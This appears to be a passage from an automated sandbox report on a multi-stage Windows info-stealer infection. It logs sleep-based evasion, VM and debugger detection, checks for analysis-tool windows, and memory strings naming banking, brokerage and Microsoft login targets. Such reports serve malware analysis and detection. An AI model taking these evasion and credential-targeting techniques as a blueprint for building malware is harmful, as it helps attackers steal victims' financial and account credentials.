Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe TID: 3056	Thread sleep count: 508 > 30
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe TID: 3056	Thread sleep count: 1257 > 30
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe TID: 6360	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4712	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe TID: 4432	Thread sleep time: -35040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe TID: 6332	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\1000238002\Amadeus.exe TID: 1844	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\1000238002\Amadeus.exe TID: 180	Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\1000238002\Amadeus.exe TID: 1844	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 984	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 5436	Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 5416	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 5436	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0041B6DA FindFirstFileExW,

12_2_0041B6DA

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\1000238002\Amadeus.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\1000238002\Amadeus.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\1000238002\Amadeus.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File opened: C:\Users\user\Desktop\desktop.ini

Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 6rxotqIg7H.exe, 0000000F.00000002.2867303710.0000000003267000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655LR]q
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000026C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\]q
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3033783708.00000000016C0000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000014.00000002.3033783708.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000016.00000002.3001288406.000000000325D000.00000004.00000020.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000002.3186685688.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000003.3164769519.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, BitcoinCore.exe, 00000017.00000002.3182167523.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, Amadeus.exe, 00000025.00000002.3374560965.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000002.3341356225.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3266547075.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: axplong.exe, 00000006.00000002.3380519963.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Hkbsse.exe, 0000002D.00000002.3378115953.0000000000A41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWCKX{S
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: runtime.exe, 00000019.00000002.3147204750.000000000089E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000026C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: RegAsm.exe, 0000000C.00000002.2724562892.0000000000479000.00000040.00000400.00020000.00000000.sdmp, pLAZbVgk7u.exe, 0000000D.00000000.2723547615.00000000001C2000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: HgFSVDCVdb86m2CfHM1
Source: stealc_default2.exe, 00000014.00000002.3033783708.000000000168E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: axplong.exe, axplong.exe, 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Nework.exe, 00000011.00000003.2754097145.0000000000C21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: PureSyncInst.exe, 00000018.00000002.3319855983.000000000125C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: Amadeus.exe, 00000025.00000002.3374560965.000000000099E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: MJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: stealc_default2.exe, 00000014.00000002.3053810297.0000000027B00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 6rxotqIg7H.exe, 0000000F.00000002.2882256148.0000000006911000.00000004.00000020.00020000.00000000.sdmp, caesium-image-compressor.exe, 00000015.00000002.2963399502.00000000009EC000.00000004.00000020.00020000.00000000.sdmp, Shipment.pif, 00000023.00000002.3381025313.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegAsm.exe, 00000009.00000002.2849741412.0000000005D2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: pLAZbVgk7u.exe, 0000000D.00000002.2741839920.00000000026C0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,]q
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: BitLockerToGo.exe, 00000016.00000002.3001288406.0000000003217000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: OmnqazpM3P.exe, 00000000.00000002.2123698214.000000000099D000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2151654795.000000000035D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2162915170.000000000035D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 6rxotqIg7H.exe, 0000000F.00000002.2873797645.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_04B80CB6 Start: 04B80D1F End: 04B80D05	6_2_04B80CB6
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_04B80C94 Start: 04B80D1F End: 04B80D05	6_2_04B80C94
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_04B80CF0 Start: 04B80D1F End: 04B80D05	6_2_04B80CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_04B80CD0 Start: 04B80D1F End: 04B80D05	6_2_04B80CD0

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
